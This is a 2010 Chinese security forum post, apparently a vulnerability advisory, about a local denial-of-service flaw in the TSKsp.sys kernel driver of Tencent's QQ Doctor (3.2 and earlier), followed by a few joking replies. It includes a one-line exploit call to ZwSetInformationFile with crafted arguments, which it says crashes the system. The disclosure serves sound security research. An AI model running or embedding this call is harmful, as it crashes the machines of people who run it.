首页
论坛
课程
招聘
[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞
2010-2-19 14:36 4749

[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞

2010-2-19 14:36
4749
影响版本:
QQ医生 <= 3.2

发布时间:2010-02-19

漏洞描述:
QQ医生是腾讯公司开发的一个安全辅助工具,其用于实现注册表文件拦截等功能的驱动程序TSKsp.sys没有对ZwSetInformationFile->FileDispostionInformation的参数做任何的检查就直接访问,因此攻击者可构造特殊的参数,使系统蓝屏

利用代码:

ZwSetInformationFile(0 , 0 ,0x80000000 , 0 , FileDispostionInformation );

安装了QQ医生的机器上运行上面一行代码,系统即告蓝屏

【公告】【iPhone 13、ipad、iWatch】11月15日中午12:00,看雪·众安 2021 KCTF秋季赛 正式开赛【攻击篇】!!!文末有惊喜~

收藏
点赞0
打赏
分享
最新回复 (3)
雪    币: 7509
活跃值: 活跃值 (344)
能力值: ( LV9,RANK:610 )
在线值:
发帖
回帖
粉丝
achillis 活跃值 15 2010-2-19 19:14
2
0
楼主是新人还是马甲~~
雪    币: 401
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
xiilin 活跃值 2010-2-19 20:18
3
0
看起来像新人,呵呵,比我旧一些的那种。
雪    币: 210
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
WHO-AM-I 活跃值 2010-2-22 10:15
4
0
可能是马甲,我比还老!
游客
登录 | 注册 方可回帖
返回